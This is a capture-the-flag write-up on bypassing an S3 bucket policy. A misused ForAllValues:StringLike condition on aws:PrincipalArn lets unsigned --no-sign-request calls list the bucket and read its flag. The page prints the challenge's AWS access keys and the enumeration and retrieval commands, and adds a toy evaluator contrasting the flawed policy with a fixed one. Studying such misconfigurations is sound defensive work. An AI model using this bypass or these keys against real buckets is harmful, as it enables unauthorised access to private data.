Kabinet's GitBook

Perfect Storage

Authored challenge from Cyber League 2025 Major 1

Last updated 4 months ago
Description

The intern is exploring S3 buckets to host internal documents. He insists that he has scoped the IAM policy correctly to restrict access solely to the admin. Prove the intern wrong by escalating your user privileges and access the secret document!

Attached File: user.txt

aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = ylEfloqS+B+O56WesG7qg8fEl0F1WD79OyckBuTf

Solve

Since the challenge description mentions IAM, the first step is IAM enumeration on the user. The keys from user.txt are configured as the perfect_storage profile, and the caller identity returned by a quick sanity check that the credentials work gives us the user name, thisisauselessuserfortesting.

aws iam list-attached-user-policies --user-name thisisauselessuserfortesting --profile perfect_storage

Standard enumeration shows that the user has the managed policy hackerman101 attached. Next, enumerate the policy itself: get-policy reports its DefaultVersionId (v2 here), and get-policy-version dumps that version's document.

aws iam get-policy --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --profile perfect_storage
aws iam get-policy-version --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --version-id v2 --profile perfect_storage

The policy document grants thisisauselessuserfortesting permissions to read from the bucket perfect-storage-7815696ecbf1c96.

However, attempting to access the bucket with these credentials fails with an explicit deny from an identity-based policy.

Let's also fetch the bucket policy, to see whether a resource-based policy is involved in the decision and whether anything there explicitly denies us.

aws s3api get-bucket-policy --bucket perfect-storage-7815696ecbf1c96 --profile perfect_storage

The bucket policy, prettified (get-bucket-policy returns the Policy field as an escaped JSON string):

{
    "Policy": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": "*",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96/*",
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96"
                ],
                "Condition": {
                    "ForAllValues:StringLike": {
                        "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"
                    }
                }
            }
        ]
    }
}

The bucket policy allows every principal (Principal "*", which includes anonymous callers) to list the bucket and get objects, but only under a condition: the caller's aws:PrincipalArn must match arn:aws:iam::666666666666:user/admin. Note that this is a different account from the one the hackerman101 policy lives in (332630900012), so no principal in the challenge account can satisfy the condition as written.

The problem is the operator. ForAllValues is a set operator intended for multivalued context keys, while aws:PrincipalArn is single-valued. ForAllValues:StringLike is true when every value of the key in the request context matches the pattern; when the key is absent from the context there are no values to check, so the condition evaluates to true. AWS documentation warns that ForAllValues with an Allow effect is overly permissive for exactly this reason.

So if we can send a request whose context carries no aws:PrincipalArn at all, i.e. an unsigned, anonymous request, the condition holds and the Allow applies. The explicit deny in our identity-based policy no longer matters either, because an anonymous caller has no identity policy to evaluate.
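To make the evaluation concrete, here is a small policy-condition evaluator written for this writeup; it is not AWS code and not part of the challenge. It models the single-valued operators plus ForAllValues/ForAnyValue, runs the challenge's bucket policy against three constructed request contexts (the admin, the intern user, and an anonymous caller with no aws:PrincipalArn in its context), and compares it with an assumed fix that uses plain StringLike. The intern's ARN is constructed from the policy's account ID and the user name seen earlier; the bucket name, admin ARN and policy statement are taken from the page.

```python
"""Toy IAM condition evaluator showing why ForAllValues on a single-valued key is a bug.

Written for this writeup; it is not AWS code and models only what the example needs.
"""
from fnmatch import fnmatchcase

BUCKET = "perfect-storage-7815696ecbf1c96"
ADMIN_ARN = "arn:aws:iam::666666666666:user/admin"


def _statement(condition_operator):
    """The challenge's bucket-policy statement, parameterised on the condition operator."""
    return {
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:ListBucket", "s3:GetObject"],
        "Resource": [f"arn:aws:s3:::{BUCKET}/*", f"arn:aws:s3:::{BUCKET}"],
        "Condition": {condition_operator: {"aws:PrincipalArn": ADMIN_ARN}},
    }


# The policy returned by get-bucket-policy on the page: set operator on a single-valued key.
WEAK_POLICY = {"Version": "2012-10-17", "Statement": [_statement("ForAllValues:StringLike")]}
# Assumed fix (mine, not the challenge author's): plain StringLike, so the key must be present.
FIXED_POLICY = {"Version": "2012-10-17", "Statement": [_statement("StringLike")]}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _op_match(op, value, patterns):
    """One string comparison; only the two operators this example needs are modelled."""
    if op == "StringEquals":
        return value in patterns
    if op == "StringLike":
        return any(fnmatchcase(value, p) for p in patterns)
    raise ValueError(f"unsupported operator {op}")


def condition_holds(condition, context):
    """Evaluate a Condition block against a request context (dict: key -> str or list[str]).

    Single-valued operator (e.g. StringLike): key missing -> False.
    ForAllValues: every context value must match; a missing key gives an empty set, and
        all() over an empty set is True. That is the documented footgun.
    ForAnyValue: at least one context value must match; a missing key gives False.
    """
    for op_key, pairs in condition.items():
        set_op, _, op = op_key.rpartition(":")  # "" / "ForAllValues" / "ForAnyValue"
        for ctx_key, patterns in pairs.items():
            patterns = _as_list(patterns)
            values = _as_list(context[ctx_key]) if ctx_key in context else []
            matches = [_op_match(op, v, patterns) for v in values]
            if set_op == "":
                if not values or not all(matches):
                    return False
            elif set_op == "ForAllValues":
                if not all(matches):  # vacuously True when values == []
                    return False
            elif set_op == "ForAnyValue":
                if not any(matches):  # False when values == []
                    return False
            else:
                raise ValueError(f"unsupported set operator {set_op}")
    return True


def evaluate(policy, action, resource, context):
    """Return 'Allow', 'Deny' or 'ImplicitDeny' for one request against one policy.

    Principal matching is reduced to "*" (anyone, anonymous callers included), which is all
    the challenge policy uses. Explicit Deny wins over any Allow, as in IAM.
    """
    decision = "ImplicitDeny"
    for stmt in policy["Statement"]:
        if stmt.get("Principal") != "*":
            raise ValueError('example only models Principal: "*"')
        if not any(fnmatchcase(action, a) for a in _as_list(stmt["Action"])):
            continue
        if not any(fnmatchcase(resource, r) for r in _as_list(stmt["Resource"])):
            continue
        if not condition_holds(stmt.get("Condition", {}), context):
            continue
        if stmt["Effect"] == "Deny":
            return "Deny"
        decision = "Allow"
    return decision


# Constructed request contexts. Every signed request carries aws:PrincipalArn; an unsigned
# (--no-sign-request) call has no principal, so the key is simply absent.
ADMIN = {"aws:PrincipalArn": ADMIN_ARN}
INTERN = {"aws:PrincipalArn": "arn:aws:iam::332630900012:user/thisisauselessuserfortesting"}
ANONYMOUS = {}


def decisions(policy):
    """Decision on s3:GetObject for flag.txt, per caller, so the two policies compare side by side."""
    obj = f"arn:aws:s3:::{BUCKET}/flag.txt"
    return {name: evaluate(policy, "s3:GetObject", obj, ctx)
            for name, ctx in (("admin", ADMIN), ("intern", INTERN), ("anonymous", ANONYMOUS))}


if __name__ == "__main__":
    print("ForAllValues:StringLike ->", decisions(WEAK_POLICY))
    print("StringLike              ->", decisions(FIXED_POLICY))
```

Running it, the weak policy reports Allow for the anonymous caller while the fixed one reports ImplicitDeny; the admin is allowed under both and the intern under neither. The toy deliberately leaves out the identity-policy side (the page says that side is an explicit deny for our user), because an anonymous request has no identity policy at all; it only shows why the set operator, not the ARN pattern, is the bug.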

aws s3 ls s3://perfect-storage-7815696ecbf1c96 --profile perfect_storage
aws s3 ls s3://perfect-storage-7815696ecbf1c96  --no-sign-request

Comparing the two listings, the signed request is denied while the second one, sent with --no-sign-request, bypasses the condition and lists the bucket. The flag can then be read the same way.

aws s3 cp s3://perfect-storage-7815696ecbf1c96/flag.txt - --no-sign-request

AWS documentation: Single-valued vs. multivalued context keys - AWS Identity and Access Management